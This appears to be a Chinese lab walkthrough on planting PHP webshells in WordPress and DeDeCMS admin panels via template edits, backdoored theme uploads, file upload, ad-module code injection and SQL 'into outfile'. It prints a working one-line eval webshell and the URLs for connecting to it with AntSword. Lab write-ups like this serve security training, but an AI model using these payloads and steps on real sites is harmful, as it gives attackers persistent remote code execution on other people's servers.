Wordperss漏洞 DeDeCMS漏洞

Wordperss漏洞

环境搭建
复制代码
#执⾏命令
cd /vulhub/wordpress/pwnscriptum
docker-compose up -d
#靶场地址
http://8.155.7.173:8080/wp-admin/

注册账号

登录

漏洞一:后台修改模板拿WebShell
步骤一:思路是修改其WP的模板写入⼀句话木马后门并访问其文件即可GetShell;登陆WP后点击 【Appearance】 -->author-bio.php
步骤二:在其模板中插入一句话木马代码..点击 【Update File】 按钮
复制代码
<?php @eval($_POST[123]);?>
步骤三:访问以下连接即可获取WebShell
复制代码
http://8.155.7.173:8080/wp-content/themes/twentyfifteen/author-bio.php
步骤四:尝试蚁剑连接获取webshell
漏洞二:上传主题拿WebShell
步骤⼀:接着上⼀个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP⽂件

先去下载一个免费模板

复制代码
https://blog.csdn.net/m0_59768231/article/details/144777066?spm=1001.2014.3001.5502

解压后打开第一个文件夹写入一句话木马

重新压缩为一个.zip压缩包

步骤二:找到网站上传模板主题的位置

选中我们刚才重新压缩好的文件

步骤三:访问以下连接即可获取WebShell
复制代码
http://8.155.7.173:8080/wp-content/themes/moban-1354265872-wordpress329-sprout-in-hands-10/1.php
步骤四:尝试蚁剑连接获取webshell

DeDeCMS漏洞

环境搭建

傻瓜式安装

漏洞一:通过文件管理器上传WebShel
步骤⼀:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过⽂件管理器上传php文件获取webshell

登陆网站后台

步骤二:登陆到后台点击 【核心】 --》 【文件式管理器】 --》 【文件上传】 将准备好的恶意代码上传
步骤三:访问上传成功后的文件
复制代码
http://127.0.0.1/dedecms/uploads/1.php
漏洞二:修改模板文件拿WebShell
步骤⼀:与WPCMS类似,直接修改模板拿WebShell..点击 【模板】 --》 【默认模板管理】 --》【index.htm】 --> 【修改】

进入后添加恶意代码

步骤二:点击 【胜成】 --》 【更新主页HTML】 --》将主页位置修改为【../index.php 】--》点击 【生成静态】 --》点击 【更新主页】 再次访问站点首页可发现变化
步骤三:访问主页,phpinfo更新成功
漏洞三:后台任意命令执行拿WebShell
步骤一:点击 【模块】 --》 【广告管理】 --》 【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】
步骤二:点击【代码】--》在图中显示的路径与站点进行拼接
复制代码
http://127.0.0.1/dedecms/plus/ad_js.php?aid=1
步骤三:使用蚁剑测试连接
漏洞四:通过后台sql命令执行拿webshell
步骤一:访问系统---sql命令行工具---执行 select @@basedir,获取mysql路径,由此瑞测网站绝对路径

猜测绝对路径为E:/phpStudy/PHPTutorial/

步骤二:into outfile写入一句话木马
步骤三:使用蚁剑测试连接
相关推荐
视觉&物联智能6 小时前
【杂谈】-人工智能风险文化对组织决策的深远影响
人工智能·安全·ai·agi
cczixun8 小时前
OpenAI连发GPT-5.5系列:免费版幻觉大降,安全版能力飙升,千亿融资估值直冲8520亿美元
人工智能·gpt·安全
@insist12310 小时前
信息安全工程师-网络安全审计产品图谱与实战应用全解
网络·安全·软考·信息安全工程师·软件水平考试
m0_7381207211 小时前
应急响应(重点)——记一次某公司流量应急溯源分析(附带下载链接)
服务器·前端·数据库·安全·web安全·网络安全
大大大大晴天️11 小时前
浅聊Hadoop集群的主流安全方案(LDAP+Kerberos+Ranger)
大数据·hadoop·安全
其实防守也摸鱼11 小时前
无线网络安全--实验 规避WLAN验证之发现隐藏的SSID
java·开发语言·网络·安全·web安全·智能路由器·无线网络安全
SuperherRo13 小时前
服务攻防-Java组件安全&FastJson&高版本JNDI&不出网C3P0&编码绕WAF&写入文件CI链
java·安全·fastjson·waf·不出网·高版本·写入文件
聚铭网络14 小时前
搞安全的谁还没点兜底绝活?——五一劳动节,致敬「网安劳动者」
网络安全
MY_TEUCK14 小时前
【Git 实习生小白专用】:最安全、永不翻车、公司最爱 的标准版本控制工作流程
git·安全·github
yezannnnnn15 小时前
AI Agent又删我数据库?我直接写了个安全拦截器(附项目源码)
安全·agent·claude